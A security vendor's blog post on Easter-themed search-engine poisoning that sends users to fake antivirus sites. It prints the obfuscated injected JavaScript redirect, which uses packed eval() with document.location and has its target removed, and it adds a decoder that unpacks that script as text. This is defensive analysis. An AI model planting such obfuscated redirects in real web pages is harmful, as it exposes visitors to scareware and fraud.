Security Response

Easter Surprise For You

Created: 26 Mar 2009 17:14:09 GMT • Updated: 23 Jan 2014 18:36:29 GMT
Parveen Vashishtha

Easter is around the corner and, as expected, attackers have already started poisoning search engine results to redirect users to websites that deliver misleading applications. Various Easter-related search keywords have been poisoned so that links to rogue websites are returned in the search listings. Examples of poisoned keywords include:

Easter verse
Popular Easter Bible verse scriptures
Easter greeting card verses
Easter Bible verses
Easter verses poems
Bible Easter verse
Easter-Bible
Easter Bible quotes

Attackers are using various tricks, such as referrer checking, to evade security researchers. If a bogus domain returned in the search listing is visited directly, the visitor sees a page with many Easter-related keywords and links used to bolster the page’s search ranking. However, if the bogus link is clicked from the search engine results, the user is redirected to malicious websites delivering misleading applications. In addition, the attackers are using “no-store, no-cache” in their HTTP headers so that these malicious pages are not stored or cached. Below are a couple of snapshots of the poisoned search results:

These bogus domains host malicious scripts that redirect users to websites delivering misleading applications. The injected script is as follows:

<script language="javascript">
myvar = String.fromCharCode(104,[Removed]);
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};
while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.1=2;',3,3,'document|location|myvar'.split('|'),0,{}));
</script>
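
The packed eval() call above can be decoded for analysis without running it. The following is an added example, not part of the original post: it reads the packer's arguments as text and rebuilds the payload, and it goes beyond the three-word sample by handling the packer's full base-62 token alphabet. The function names are illustrative, and SAMPLE is the page's packed call with the `myvar` line left out.

```javascript
// SAMPLE: the packed call from the page, held as inert text (never evaluated).
const SAMPLE = String.raw`eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.1=2;',3,3,'document|location|myvar'.split('|'),0,{}));`;

// Token that stands for dictionary index n in the packer's alphabet
// (digits, then a-z, then A-Z, most significant digit first).
function packerToken(n, radix) {
  const head = n < radix ? '' : packerToken(Math.floor(n / radix), radix);
  const d = n % radix;
  return head + (d > 35 ? String.fromCharCode(d + 29) : d.toString(36));
}

// Extract payload, radix, word count and dictionary from the trailing
// }('payload',radix,count,'w0|w1|...'.split('|') argument list.
function parsePacked(source) {
  const re = /\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)/;
  const m = re.exec(source);
  if (!m) return null; // not a p,a,c,k,e,d call
  return {
    payload: m[1],
    radix: Number(m[2]),
    count: Number(m[3]),
    words: m[4].split('|'),
  };
}

// Rebuild the hidden script by substituting tokens with dictionary words.
function unpack(source) {
  const args = parsePacked(source);
  if (!args) return null;
  const table = new Map();
  for (let i = 0; i < args.count; i++) {
    const tok = packerToken(i, args.radix);
    // An empty dictionary slot means the token stands for itself.
    table.set(tok, args.words[i] || tok);
  }
  // Undo only the \' and \\ escapes of the quoted payload literal.
  const payload = args.payload.replace(/\\(['\\])/g, '$1');
  return payload.replace(/\b\w+\b/g, (tok) => (table.has(tok) ? table.get(tok) : tok));
}

console.log(unpack(SAMPLE));
```

For the script on this page the decoded payload is a single assignment of `myvar`, the string built with String.fromCharCode, to document.location.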

This script redirects users to a website that displays a fake antivirus “scan” screen and delivers a rogue application. Here is a snapshot of the misleading website:

Many of the bogus domains in question are currently redirecting to wikipedia.org, which most likely means that the attackers will change the redirection to point to malicious domains sometime in the future. The good news is that Symantec customers with updated definitions are protected from this attack.